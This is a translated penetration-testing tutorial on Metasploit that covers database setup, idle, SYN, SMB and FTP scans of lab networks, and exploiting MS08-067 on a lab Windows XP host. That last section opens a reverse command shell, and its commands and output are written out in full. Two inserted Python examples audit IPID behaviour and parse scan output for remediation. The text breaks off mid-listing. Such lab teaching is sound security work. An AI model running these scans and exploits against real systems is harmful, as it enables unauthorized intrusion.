Penetration Testing / Work in progress    2016.01.24 11:37

02. Scanning and Attacking with the Metasploit Tool



 - A tool made up of information gathering, attack (exploit) and attack plugin (payload) components
 - External modules such as vulnerability checkers and port scanners can be used, and results can be stored in a DB
 - Information-gathering and attack modules are simple to run
 - External (Linux) commands can be used inside msfconsole
 - Attack tools that run on Linux can be executed from Metasploit and their results saved



1. Connecting Metasploit to the DB


# /etc/init.d/postgresql start    start PostgreSQL

# su postgres                     switch to the DB administrator account

$ createuser msf1 -P              create the DB account and set its password (to delete it: $ dropuser msf1)

passwd : msf1

$ createdb --owner=msf1 msf1_db   create the user's database

$ exit                            return to the original account

# msfconsole                      start the Metasploit console tool

msf> help                         Metasploit command help

msf> db_status                    check the DB connection

msf> db_connect msf1:<password>@localhost:5432/msf1_db      connect to the DB


 - A module that has been used once stays cached, so it is faster the next time it is used
 - To disconnect, use the 'db_disconnect' command


msf> db_status


msf> search scanner

msf> use scanner_name

msf> back

msf> exit


 

[Note] Meaning of module Rank

Rank                                   Success : Failure
normal      information gathering       50 : 50
great       information gathering       70 : 30
excellent   information gathering       90 : 10




2. Difference between external and internal commands in MSF

Ex1) External commands can be used, but their results are not stored in the DB


msf > nmap -sS 172.16.4.254 -v

[*] exec: nmap -sS 172.16.4.254 -v



Ex2) Running the internal msf nmap command; results are stored in the DB

msf> db_nmap -sS -A -p 8080 172.16.4.254

([*] exec: line does not appear)

msf> help

msf > hosts      list the hosts recorded in the DB



Hosts

=====


address       mac  name  os_name  os_flavor  os_sp  purpose  info  comments

-------       ---  ----  -------  ---------  -----  -------  ----  --------

172.16.4.254             Linux                      server   



msf > services      check the service state recorded in the DB for that target


Services

========


host          port  proto  name        state     info

----          ----  -----  ----        -----     ----

172.16.4.254  8080  tcp    http-proxy  filtered  




3. Metasploit terminology

 - Exploit : a method of abusing a vulnerability in a system, application, server, etc., e.g. SQL Injection, Buffer Overflow
 - Payload : the code to be executed on the system, delivered by the framework (e.g. malicious code)
 - Shell code : the set of instructions used in the payload and executed when the attack runs
 - Module : a software component used in the Metasploit framework




4. Scanning with msf

Ex1) idle scanning

 - A scanning method for evading IDS/IPS
 - A technique that looks for a powered-on system that is not communicating (generating no packets)
 - Can be combined with IP spoofing when scanning

msf > search scanner      a long list appears
msf > search ipidseq      only 'ipidseq' entries appear


Matching Modules

================


   Name                          Disclosure Date  Rank    Description

   ----                          ---------------  ----    -----------

   auxiliary/scanner/ip/ipidseq                   normal  IPID Sequence Scanner



msf > use auxiliary/scanner/ip/ipidseq

msf auxiliary(ipidseq) > help

msf auxiliary(ipidseq) > help show

msf auxiliary(ipidseq) > show options


Module options (auxiliary/scanner/ip/ipidseq):


   Name       Current Setting  Required  Description

   ----       ---------------  --------  -----------

   INTERFACE                   no        The name of the interface                    interface to use
   RHOSTS                      yes       The target address range or CIDR identifier  target subnet or IP address
   RPORT      80               yes       The target port                              target port
   SNAPLEN    65535            yes       The number of bytes to capture               amount of data to capture (bytes)
   THREADS    1                yes       The number of concurrent threads             speed; a lower number is slower
   TIMEOUT    500              yes       The reply read timeout in milliseconds       reply timeout (lowering it is recommended)

 - no : optional (but it must be set to use one specific interface only; leave it unset to apply to all interfaces)
 - yes : a value must always be supplied

THREADS : if there are many targets, a higher value is recommended

 - Windows THREADS : 16 (setting it above 16 makes almost no difference to the results)
 - Linux THREADS : can be set higher




msf auxiliary(ipidseq) > set RHOSTS 172.16.0.0/16      scan the '172.16.0.0/16' subnet
RHOSTS => 172.16.0.0/16

msf auxiliary(ipidseq) > set RPORT 8080              set the port
RPORT => 8080

msf auxiliary(ipidseq) > set THREADS 50              set the threads
THREADS => 50

(to clear a value: unset RHOSTS)



msf auxiliary(ipidseq) > show options


Module options (auxiliary/scanner/ip/ipidseq):


   Name       Current Setting  Required  Description

   ----       ---------------  --------  -----------

   INTERFACE                   no        The name of the interface

   RHOSTS     172.16.0.0/16    yes       The target address range or CIDR identifier

   RPORT      8080             yes       The target port

   SNAPLEN    65535            yes       The number of bytes to capture

   THREADS    50               yes       The number of concurrent threads

   TIMEOUT    500              yes       The reply read timeout in milliseconds




msf auxiliary(ipidseq) > run        execute

[*] 172.16.0.1's IPID sequence class : Incremental!     target that is not communicating (chosen as the IP address to spoof)
[*] 172.16.0.50's IPID sequence class : Incremental!
[*] 172.16.0.51's IPID sequence class : Unknown         powered-off target

~ output omitted ~

msf auxiliary(ipidseq) >  db_nmap -p 8080 -Pn -sI 172.16.0.50 172.16.4.254

[*] Nmap: Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-01-24 11:46 KST

[*] Nmap: Idle scan using zombie 172.16.0.50 (172.16.0.50:80); Class: Incremental

[*] Nmap: Nmap scan report for 172.16.4.254

[*] Nmap: Host is up (0.19s latency).

[*] Nmap: PORT     STATE SERVICE

[*] Nmap: 8080/tcp open  http-proxy

[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 92.54 seconds


 - -Pn : used so that the attacker's real IP address is not revealed (it skips the host-discovery ping, which would otherwise be sent from the attacker's own address)


msf auxiliary(ipidseq) > back

msf >
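As an added defender-side example (not from the original post and not the ipidseq module's own code): the class names the scanner prints above can be reproduced offline from the IP ID values observed in a host's replies, which lets you audit your own network for hosts that an idle scan could abuse as a zombie. The gap thresholds approximate nmap's classes and are an assumption, as is the constructed sample data.

```python
from typing import Dict, List, Tuple

# Thresholds that approximate nmap's IPID sequence classes (assumption; they
# are not copied from the Metasploit module or from nmap's source).
INCR_MAX_GAP = 10     # every gap below this    -> "Incremental!"
RPI_MAX_GAP = 1000    # every gap below this    -> "Random positive increments"
MIN_SAMPLES = 3       # fewer replies than this -> "Unknown"


def _gaps(ids: List[int], byteswap: bool = False) -> List[int]:
    """Differences between consecutive 16-bit IP IDs, modulo 65536, so a
    counter that wraps 65535 -> 0 still shows as a gap of 1."""
    if byteswap:  # some stacks put the counter on the wire little-endian
        ids = [((i & 0xFF) << 8) | ((i >> 8) & 0xFF) for i in ids]
    return [(b - a) & 0xFFFF for a, b in zip(ids, ids[1:])]


def classify_ipid(ids: List[int]) -> str:
    """Return the class name in the wording the scanner prints."""
    if len(ids) < MIN_SAMPLES:
        return "Unknown"          # no or too few replies: host down or filtered
    if all(i == 0 for i in ids):
        return "All zeros"
    gaps = _gaps(ids)
    if all(g == 0 for g in gaps):
        return "Constant"
    if all(0 < g < INCR_MAX_GAP for g in gaps):
        return "Incremental!"
    if all(0 < g < INCR_MAX_GAP for g in _gaps(ids, byteswap=True)):
        return "Broken little-endian incremental!"
    if all(0 < g < RPI_MAX_GAP for g in gaps):
        return "Random positive increments"
    return "Randomized"


def usable_as_zombie(ipid_class: str) -> bool:
    """Only a global, predictable counter leaks whether a third party's probe
    was answered, which is exactly what an idle scan needs from a zombie."""
    return ipid_class in ("Incremental!", "Broken little-endian incremental!")


def audit(observations: Dict[str, List[int]]) -> Dict[str, Tuple[str, bool]]:
    """Map each host to (class, abusable-as-zombie) for a remediation list."""
    result = {}
    for host, ids in observations.items():
        cls = classify_ipid(ids)
        result[host] = (cls, usable_as_zombie(cls))
    return result


# Constructed sample: IP ID values as if read from successive replies of each
# host (the real module collects them from the SYN/ACK or RST replies).
SAMPLE = {
    "172.16.0.50": [31337, 31338, 31339, 31340],   # quiet host, sequential
    "172.16.0.1":  [65534, 65535, 0, 1],           # sequential across the wrap
    "172.16.0.9":  [0x0100, 0x0200, 0x0300],       # counter byte-swapped on the wire
    "172.16.0.20": [12000, 52000, 3000, 40000],    # randomized (modern stack)
    "172.16.0.7":  [0, 0, 0, 0],                   # always zero
    "172.16.0.51": [],                             # no replies: powered off
}

if __name__ == "__main__":
    for host, (cls, zombie) in audit(SAMPLE).items():
        flag = "   <- remediate: enable randomized IP IDs" if zombie else ""
        print(f"{host}'s IPID sequence class : {cls}{flag}")
```

Hosts reported as Incremental are the ones to fix (or retire): a stack with randomized or per-connection IP IDs cannot be used as a zombie, and the scan in this section would report it as Randomized.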




Ex2) Syn scan

 - A scanning method that checks the port states on the target
 - Cannot gather as wide a variety of information as nmap


msf > search portscan


Matching Modules

================


   Name                                              Disclosure Date  Rank    Description

   ----                                              ---------------  ----    -----------

   auxiliary/scanner/http/wordpress_pingback_access                   normal  Wordpress Pingback Locator

   auxiliary/scanner/natpmp/natpmp_portscan                           normal  NAT-PMP External Port Scanner

   auxiliary/scanner/portscan/ack                                     normal  TCP ACK Firewall Scanner

   auxiliary/scanner/portscan/ftpbounce                               normal  FTP Bounce Port Scanner

   auxiliary/scanner/portscan/syn                                     normal  TCP SYN Port Scanner

   auxiliary/scanner/portscan/tcp                                     normal  TCP Port Scanner

   auxiliary/scanner/portscan/xmas                                    normal  TCP "XMas" Port Scanner

   auxiliary/scanner/sap/sap_router_portscanner                       normal  SAPRouter Port Scanner



msf > use scanner/portscan/syn 

msf auxiliary(syn) > show options


Module options (auxiliary/scanner/portscan/syn):


   Name       Current Setting  Required  Description

   ----       ---------------  --------  -----------

   BATCHSIZE  256              yes       The number of hosts to scan per set

   INTERFACE                   no        The name of the interface

   PORTS      1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)

   RHOSTS                      yes       The target address range or CIDR identifier

   SNAPLEN    65535            yes       The number of bytes to capture

   THREADS    1                yes       The number of concurrent threads

   TIMEOUT    500              yes       The reply read timeout in milliseconds


msf auxiliary(syn) > set PORTS 1-80

PORTS => 1-80


msf auxiliary(syn) > set RHOSTS 172.16.4.254

RHOSTS => 172.16.4.254


msf auxiliary(syn) > set TEREADS 16        (typo for 'set THREADS 16'; because of it THREADS stays at 1 in the options below)
TEREADS => 16


msf auxiliary(syn) > show options


Module options (auxiliary/scanner/portscan/syn):


   Name       Current Setting  Required  Description

   ----       ---------------  --------  -----------

   BATCHSIZE  256              yes       The number of hosts to scan per set

   INTERFACE                   no        The name of the interface

   PORTS      1-80             yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS     172.16.4.254     yes       The target address range or CIDR identifier

   SNAPLEN    65535            yes       The number of bytes to capture

   THREADS    1                yes       The number of concurrent threads

   TIMEOUT    500              yes       The reply read timeout in milliseconds


msf auxiliary(syn) > run


msf auxiliary(syn) > back

msf >



Ex3) SMB (server message block) scan

 - A scanning method that uses Windows NetBIOS


msf > search smb_version


Matching Modules

================


   Name                               Disclosure Date  Rank    Description

   ----                               ---------------  ----    -----------

   auxiliary/scanner/smb/smb_version                   normal  SMB Version Detection



msf > use scanner/smb/smb_version 

msf auxiliary(smb_version) > 

msf auxiliary(smb_version) > show options


Module options (auxiliary/scanner/smb/smb_version):


   Name       Current Setting  Required  Description

   ----       ---------------  --------  -----------

   RHOSTS                      yes       The target address range or CIDR identifier

   SMBDomain  WORKGROUP        no        The Windows domain to use for authentication

   SMBPass                     no        The password for the specified username

   SMBUser                     no        The username to authenticate as

   THREADS    1                yes       The number of concurrent threads



msf auxiliary(smb_version) > set RHOSTS 172.16.4.0/24

RHOSTS => 172.16.4.0/24


msf auxiliary(smb_version) > set THREADS 16

THREADS => 16


msf auxiliary(smb_version) > show options


Module options (auxiliary/scanner/smb/smb_version):


   Name       Current Setting  Required  Description

   ----       ---------------  --------  -----------

   RHOSTS     172.16.4.0/24    yes       The target address range or CIDR identifier

   SMBDomain  WORKGROUP        no        The Windows domain to use for authentication

   SMBPass                     no        The password for the specified username

   SMBUser                     no        The username to authenticate as

   THREADS    16               yes       The number of concurrent threads



msf auxiliary(smb_version) > run


[*] 172.16.4.11:445 is running Windows 7 Enterprise SP1 (build:7601) (name:SOLDESK-PC) (domain:WORKGROUP)

[*] 172.16.4.10:445 is running Windows 7 Ultimate SP1 (build:7601) (name:SOLDESK-PC) (domain:WORKGROUP)

[*] 172.16.4.12:445 is running Windows 7 Enterprise SP1 (build:7601) (name:SOLDESK-PC) (domain:WORKGROUP)

[*] 172.16.4.3:445 is running Windows 7 Ultimate SP1 (build:7601) (name:SOLDESK-PC) (domain:WORKGROUP)

[*] 172.16.4.18:445 is running Windows 7 Ultimate SP1 (build:7601) (name:SOLDESK-PC) (domain:WORKGROUP)

[*] 172.16.4.23:445 is running Windows 7 Enterprise SP1 (build:7601) (name:SOLDESKJ-PC) (domain:WORKGROUP)

[*] 172.16.4.22:445 is running Windows 7 Enterprise SP1 (build:7601) (name:SOLDESK-PC) (domain:WORKGROUP)

[*] Scanned  26 of 256 hosts (10% complete)

[*] Scanned  56 of 256 hosts (21% complete)

[*] Scanned  79 of 256 hosts (30% complete)

[*] Scanned 110 of 256 hosts (42% complete)

[*] Scanned 128 of 256 hosts (50% complete)

[*] Scanned 155 of 256 hosts (60% complete)

[*] Scanned 180 of 256 hosts (70% complete)

[*] Scanned 207 of 256 hosts (80% complete)

[*] Scanned 240 of 256 hosts (93% complete)

[*] Scanned 256 of 256 hosts (100% complete)

[*] Auxiliary module execution completed


msf auxiliary(smb_version) > 

msf auxiliary(smb_version) > back

msf >




Ex4) FTP scan

 - A method for scanning FTP servers


msf > search ftp_version


Matching Modules

================


   Name                               Disclosure Date  Rank    Description

   ----                               ---------------  ----    -----------

   auxiliary/scanner/ftp/ftp_version                   normal  FTP Version Scanner



msf > use scanner/ftp/ftp_version

msf auxiliary(ftp_version) > show options


Module options (auxiliary/scanner/ftp/ftp_version):


   Name     Current Setting      Required  Description

   ----     ---------------      --------  -----------

   FTPPASS  mozilla@example.com  no        The password for the specified username

   FTPUSER  anonymous            no        The username to authenticate as

   RHOSTS                        yes       The target address range or CIDR identifier

   RPORT    21                   yes       The target port

   THREADS  1                    yes       The number of concurrent threads


msf auxiliary(ftp_version) > set RHOSTS 172.16.4.0/24

RHOSTS => 172.16.4.0/24


msf auxiliary(ftp_version) > set THREADS 50

THREADS => 50


msf auxiliary(ftp_version) > show options


Module options (auxiliary/scanner/ftp/ftp_version):


   Name     Current Setting      Required  Description

   ----     ---------------      --------  -----------

   FTPPASS  mozilla@example.com  no        The password for the specified username

   FTPUSER  anonymous            no        The username to authenticate as

   RHOSTS   172.16.4.0/24        yes       The target address range or CIDR identifier

   RPORT    21                   yes       The target port

   THREADS  50                   yes       The number of concurrent threads


msf auxiliary(ftp_version) > run


[*] Scanned  32 of 256 hosts (12% complete)

[*] Scanned  70 of 256 hosts (27% complete)

[*] Scanned  92 of 256 hosts (35% complete)

[*] Scanned 112 of 256 hosts (43% complete)

[*] Scanned 139 of 256 hosts (54% complete)

[*] Scanned 157 of 256 hosts (61% complete)

[*] Scanned 200 of 256 hosts (78% complete)

[*] Scanned 214 of 256 hosts (83% complete)

[*] Scanned 243 of 256 hosts (94% complete)

[*] Scanned 256 of 256 hosts (100% complete)

[*] Auxiliary module execution completed


msf auxiliary(ftp_version) > back

msf >




5. Exploit Tools

 - Find a vulnerability -> carry out the attack
 - Attacker : Kali Linux (192.168.10.134)
 - Target : Win XP (192.168.10.135) -> click the play button on the FTP server

Ex1) Run db_nmap scans


msf > db_nmap -sS -p 1-500 192.168.10.135

msf > db_nmap -sS -Pn -A -p 1-500 192.168.10.135

msf > db_nmap -sS -Pn -p 1-500 --script=smb-check-vulns 192.168.10.135



msf > db_nmap -sS -p 1-500 192.168.10.135

[*] Nmap: Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-01-24 14:29 KST

[*] Nmap: Nmap scan report for 192.168.10.135

[*] Nmap: Host is up (0.0011s latency).

[*] Nmap: Not shown: 493 closed ports

[*] Nmap: PORT    STATE SERVICE

[*] Nmap: 21/tcp  open  ftp

[*] Nmap: 25/tcp  open  smtp

[*] Nmap: 80/tcp  open  http

[*] Nmap: 135/tcp open  msrpc

[*] Nmap: 139/tcp open  netbios-ssn

[*] Nmap: 443/tcp open  https

[*] Nmap: 445/tcp open  microsoft-ds

[*] Nmap: MAC Address: 00:0C:29:AB:E2:7A (VMware)

[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 1.55 seconds



msf > db_nmap -sS -Pn -A -p 1-500 192.168.10.135

[*] Nmap: Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-01-24 14:25 KST

[*] Nmap: Nmap scan report for 192.168.10.135

[*] Nmap: Host is up (0.00042s latency).

[*] Nmap: Not shown: 493 closed ports

[*] Nmap: PORT    STATE SERVICE      VERSION

[*] Nmap: 21/tcp  open  ftp          EasyFTP Server ftpd

[*] Nmap: | ftp-anon: Anonymous FTP login allowed (FTP code 230)

[*] Nmap: | drw-rw-rw-   1 user     group            0 Jan 24 12:02 . [NSE: writeable]

[*] Nmap: |_drw-rw-rw-   1 user     group            0 Jan 24 12:02 .. [NSE: writeable]

[*] Nmap: |_ftp-bounce: no banner

[*] Nmap: 25/tcp  open  smtp         Microsoft ESMTP 6.0.2600.5512

[*] Nmap: | smtp-commands: with-15b28b4cfd Hello [192.168.10.134], SIZE 2097152, PIPELINING, DSN, ENHANCEDSTATUSCODES, 8bitmime, BINARYMIME, CHUNKING, VRFY, OK,
[*] Nmap: |_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT VRFY

[*] Nmap: 80/tcp  open  http         Microsoft IIS httpd 5.1

[*] Nmap: |_http-methods: No Allow or Public header in OPTIONS response (status code 404)

[*] Nmap: |_http-server-header: Microsoft-IIS/5.1

[*] Nmap: |_http-title: Site Not Found

[*] Nmap: 135/tcp open  msrpc        Microsoft Windows RPC

[*] Nmap: 139/tcp open  netbios-ssn  Microsoft Windows 98 netbios-ssn

[*] Nmap: 443/tcp open  https?

[*] Nmap: | http-cisco-anyconnect:

[*] Nmap: |_  ERROR: Not a Cisco ASA or unsupported version

[*] Nmap: 445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds

[*] Nmap: MAC Address: 00:0C:29:AB:E2:7A (VMware)

[*] Nmap: Device type: general purpose

[*] Nmap: Running: Microsoft Windows XP

[*] Nmap: OS CPE: cpe:/o:microsoft:windows_xp::sp3

[*] Nmap: OS details: Microsoft Windows XP SP3

[*] Nmap: Network Distance: 1 hop

[*] Nmap: Service Info: Host: with-15b28b4cfd; OSs: Windows, Windows 98, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_98, cpe:/o:microsoft:windows_xp

[*] Nmap: Host script results:

[*] Nmap: | ms-sql-info:

[*] Nmap: |   \\192.168.10.135\pipe\sql\query:

[*] Nmap: |     Version:

[*] Nmap: |       name: Microsoft SQL Server 2000 RTM

[*] Nmap: |       number: 8.00.194.00

[*] Nmap: |       Product: Microsoft SQL Server 2000

[*] Nmap: |       Service pack level: RTM

[*] Nmap: |       Post-SP patches applied: false

[*] Nmap: |_    Named pipe: \\192.168.10.135\pipe\sql\query

[*] Nmap: |_nbstat: NetBIOS name: WITH-15B28B4CFD, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:ab:e2:7a (VMware)

[*] Nmap: | smb-os-discovery:

[*] Nmap: |   OS: Windows XP (Windows 2000 LAN Manager)

[*] Nmap: |   OS CPE: cpe:/o:microsoft:windows_xp::-

[*] Nmap: |   Computer name: with-15b28b4cfd

[*] Nmap: |   NetBIOS computer name: WITH-15B28B4CFD

[*] Nmap: |   Workgroup: WORKGROUP

[*] Nmap: |_  System time: 2016-01-24T14:26:02+09:00

[*] Nmap: | smb-security-mode:

[*] Nmap: |   account_used: guest

[*] Nmap: |   authentication_level: user

[*] Nmap: |   challenge_response: supported

[*] Nmap: |_  message_signing: disabled (dangerous, but default)

[*] Nmap: |_smbv2-enabled: Server doesn't support SMBv2 protocol

[*] Nmap: TRACEROUTE

[*] Nmap: HOP RTT     ADDRESS

[*] Nmap: 1   0.42 ms 192.168.10.135

[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 26.68 seconds




msf > db_nmap -sS -Pn -p 1-500 --script=smb-check-vulns 192.168.10.135

[*] Nmap: Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-01-24 14:26 KST

[*] Nmap: Nmap scan report for 192.168.10.135

[*] Nmap: Host is up (0.00090s latency).

[*] Nmap: Not shown: 493 closed ports

[*] Nmap: PORT    STATE SERVICE

[*] Nmap: 21/tcp  open  ftp

[*] Nmap: 25/tcp  open  smtp

[*] Nmap: 80/tcp  open  http

[*] Nmap: 135/tcp open  msrpc

[*] Nmap: 139/tcp open  netbios-ssn

[*] Nmap: 443/tcp open  https

[*] Nmap: 445/tcp open  microsoft-ds

[*] Nmap: MAC Address: 00:0C:29:AB:E2:7A (VMware)

[*] Nmap: Host script results:

[*] Nmap: | smb-check-vulns:

[*] Nmap: |   MS08-067: CHECK DISABLED (add '--script-args=unsafe=1' to run)
                (vulnerable and exploitable; the attack no longer works from Windows 6 onward)

[*] Nmap: |   Conficker: Likely CLEAN
[*] Nmap: |   regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
                (vulnerable)
[*] Nmap: |   SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
                (vulnerable)
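As an added example (not part of the original post and not Metasploit's or nmap's own code): a small parser that pulls the open ports and the findings worth escalating out of db_nmap's `[*] Nmap:`-prefixed console output, so the three scans above reduce to a remediation list. The risk rules and the sample excerpt are constructed for this example; the needles are the wording the nmap scripts print above.

```python
import re
from typing import Dict, List, Tuple

PREFIX = "[*] Nmap: "   # msfconsole prepends this to every db_nmap output line
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

# Substrings of NSE script output that a reviewer should escalate (constructed
# rules for this example; the labels are ours, the needles are nmap's wording).
RISK_RULES: List[Tuple[str, str]] = [
    ("Anonymous FTP login allowed", "anonymous FTP login enabled"),
    ("message_signing: disabled", "SMB signing disabled (relay/MITM risk)"),
    ("Server doesn't support SMBv2", "SMBv1-only host (legacy SMB stack)"),
    ("Post-SP patches applied: false", "unpatched SQL Server instance"),
    ("CHECK DISABLED", "vuln check skipped: result inconclusive, re-run it"),
]


def parse_db_nmap(text: str) -> Dict[str, list]:
    """Split db_nmap console output into open ports and flagged findings."""
    open_ports, findings = [], []
    for raw in text.splitlines():
        if not raw.startswith(PREFIX):
            continue                    # hand-written annotation or blank line
        line = raw[len(PREFIX):]
        m = PORT_RE.match(line)
        if m:                           # "21/tcp  open  ftp   EasyFTP Server ftpd"
            port, proto, state, service, version = m.groups()
            if state == "open":
                open_ports.append((int(port), proto, service, version.strip()))
            continue
        if line.lstrip().startswith("|"):          # NSE script output line
            body = line.strip().lstrip("|_ ").strip()
            for needle, label in RISK_RULES:
                if needle in body:
                    findings.append((label, body))
    return {"open_ports": open_ports, "findings": findings}


# Constructed excerpt in the shape of the console output above; the line
# without the prefix is an annotation and must be ignored by the parser.
SAMPLE_OUTPUT = """\
[*] Nmap: Nmap scan report for 192.168.10.135
[*] Nmap: Host is up (0.00042s latency).
[*] Nmap: PORT    STATE SERVICE      VERSION
[*] Nmap: 21/tcp  open  ftp          EasyFTP Server ftpd
[*] Nmap: | ftp-anon: Anonymous FTP login allowed (FTP code 230)
[*] Nmap: |_ftp-bounce: no banner
[*] Nmap: 80/tcp  open  http         Microsoft IIS httpd 5.1
[*] Nmap: 443/tcp open  https?
[*] Nmap: 445/tcp open  microsoft-ds Microsoft Windows XP microsoft-ds
[*] Nmap: Host script results:
[*] Nmap: | smb-security-mode:
[*] Nmap: |_  message_signing: disabled (dangerous, but default)
[*] Nmap: |_smbv2-enabled: Server doesn't support SMBv2 protocol
[*] Nmap: | smb-check-vulns:
[*] Nmap: |   MS08-067: CHECK DISABLED (add '--script-args=unsafe=1' to run)
                (annotation line without the prefix: skipped)
[*] Nmap: |   Conficker: Likely CLEAN
"""

if __name__ == "__main__":
    report = parse_db_nmap(SAMPLE_OUTPUT)
    for port, proto, service, version in report["open_ports"]:
        print(f"open  {port}/{proto:<4} {service:<14} {version}")
    for label, body in report["findings"]:
        print(f"FLAG  {label}: {body}")
```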




Ex2) Finding the attack module (Payload : windows/shell/reverse_tcp)


msf > search ms08-067


Matching Modules

================


   Name                                 Disclosure Date  Rank   Description

   ----                                 ---------------  ----   -----------

   exploit/windows/smb/ms08_067_netapi  2008-10-28       great  MS08-067 Microsoft Server Service Relative Path Stack Corruption


msf > use windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > 

msf exploit(ms08_067_netapi) > show options


Module options (exploit/windows/smb/ms08_067_netapi):


   Name     Current Setting  Required  Description

   ----     ---------------  --------  -----------

   RHOST                     yes       The target address

   RPORT    445              yes       Set the SMB service port

   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)



Exploit target:


   Id  Name

   --  ----

   0   Automatic Targeting




msf exploit(ms08_067_netapi) > show payloads


Compatible Payloads

===================


   Name                                                Disclosure Date  Rank    Description

   ----                                                ---------------  ----    -----------

   generic/custom                                                       normal  Custom Payload

   generic/debug_trap                                                   normal  Generic x86 Debug Trap

   generic/shell_bind_tcp                                               normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp                                            normal  Generic Command Shell, Reverse TCP Inline
   generic/tight_loop                                                   normal  Generic x86 Tight Loop


~ output omitted ~


Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/shell/reverse_tcp                                            normal  Windows Command Shell, Reverse TCP Stager
   windows/shell/reverse_tcp_allports                                   normal  Windows Command Shell, Reverse All-Port TCP Stager
   windows/shell/reverse_tcp_dns                                        normal  Windows Command Shell, Reverse TCP Stager (DNS)
   windows/shell/reverse_tcp_rc4                                        normal  Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption)
   windows/shell/reverse_tcp_uuid                                       normal  Windows Command Shell, Reverse TCP Stager with UUID Support
   windows/shell_bind_tcp                                               normal



 - A Shell payload is used for going straight in, without an intermediate interface


msf exploit(ms08_067_netapi) > set payload windows/shell/reverse_tcp

payload => windows/shell/reverse_tcp


msf exploit(ms08_067_netapi) > show options 


Module options (exploit/windows/smb/ms08_067_netapi):


   Name     Current Setting  Required  Description

   ----     ---------------  --------  -----------

   RHOST                       yes       The target address

   RPORT    445              yes       Set the SMB service port

   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)



Payload options (windows/shell/reverse_tcp):


   Name      Current Setting  Required  Description

   ----      ---------------  --------  -----------

   EXITFUNC  thread           yes       Exit technique (Accepted: , , seh, thread, process, none)

   LHOST                      yes       The listen address

   LPORT     4444             yes       The listen port



Exploit target:


   Id  Name

   --  ----

   0   Automatic Targeting



msf exploit(ms08_067_netapi) > 



msf exploit(ms08_067_netapi) > show targets


Exploit targets:


   Id  Name

   --  ----

   0   Automatic Targeting

   1   Windows 2000 Universal

   2   Windows XP SP0/SP1 Universal

   3   Windows 2003 SP0 Universal

   4   Windows XP SP2 English (AlwaysOn NX)

   5   Windows XP SP2 English (NX)


~ output omitted ~


 47  Windows XP SP3 Korean (NX)



msf exploit(ms08_067_netapi) > set LHOST 192.168.10.134

LHOST => 192.168.10.134


msf exploit(ms08_067_netapi) > set LPORT 8080

LPORT => 8080


msf exploit(ms08_067_netapi) > set RHOST 192.168.10.135

RHOST => 192.168.10.135


msf exploit(ms08_067_netapi) > set target 47

target => 47



msf exploit(ms08_067_netapi) > show options


Module options (exploit/windows/smb/ms08_067_netapi):


   Name     Current Setting  Required  Description

   ----     ---------------  --------  -----------

   RHOST    192.168.10.135   yes       The target address

   RPORT    445              yes       Set the SMB service port

   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)



Payload options (windows/shell/reverse_tcp):


   Name      Current Setting  Required  Description

   ----      ---------------  --------  -----------

   EXITFUNC  thread           yes       Exit technique (Accepted: , , seh, thread, process, none)

   LHOST     192.168.10.134   yes       The listen address

   LPORT     8080             yes       The listen port


Exploit target:


   Id  Name

   --  ----

   47  Windows XP SP3 Korean (NX)



msf exploit(ms08_067_netapi) > exploit


[*] Started reverse handler on 192.168.10.134:8080 

[*] Attempting to trigger the vulnerability...

[*] Encoded stage with x86/shikata_ga_nai

[*] Sending encoded stage (267 bytes) to 192.168.10.135

[*] Command shell session 1 opened (192.168.10.134:8080 -> 192.168.10.135:1078) at 2016-01-24 15:19:10 +0900


Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.


C:\WINDOWS\system32>

C:\WINDOWS\system32>ipconfig

ipconfig



Windows IP Configuration



Ethernet adapter ���� ���� ����:


        Connection-specific DNS Suffix  . : localdomain

        IP Address. . . . . . . . . . . . : 192.168.10.135

        Subnet Mask . . . . . . . . . . . : 255.255.255.0

        Default Gateway . . . . . . . . . : 192.168.10.2


C:\WINDOWS\system32>

C:\WINDOWS\system32>^C  (ctrl+c)

Abort session 1? [y/N]  y


[*] 192.168.10.135 - Command shell session 1 closed.  Reason: User exit

msf exploit(ms08_067_netapi) > 

msf exploit(ms08_067_netapi) > back

msf > 


 - When the exploit runs you are connected directly to a command prompt on the target system.
 - Because the session was obtained through a BOF-style attack, the command window has bugs and some commands cannot be used.




Ex3) Finding the attack module (Payload : meterpreter/reverse_tcp)


msf > search ms08-067


Matching Modules

================


   Name                                 Disclosure Date  Rank   Description

   ----                                 ---------------  ----   -----------

   exploit/windows/smb/ms08_067_netapi  2008-10-28       great  MS08-067 Microsoft Server Service Relative Path Stack Corruption




msf > use windows/smb/ms08_067_netapi


msf exploit(ms08_067_netapi) > show options


Module options (exploit/windows/smb/ms08_067_netapi):


   Name     Current Setting  Required  Description

   ----     ---------------  --------  -----------

   RHOST    192.168.10.135   yes       The target address

   RPORT    445              yes       Set the SMB service port

   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)



Payload options (windows/shell/reverse_tcp):


   Name      Current Setting  Required  Description

   ----      ---------------  --------  -----------

   EXITFUNC  thread           yes       Exit technique (Accepted: , , seh, thread, process, none)

   LHOST     192.168.10.134   yes       The listen address

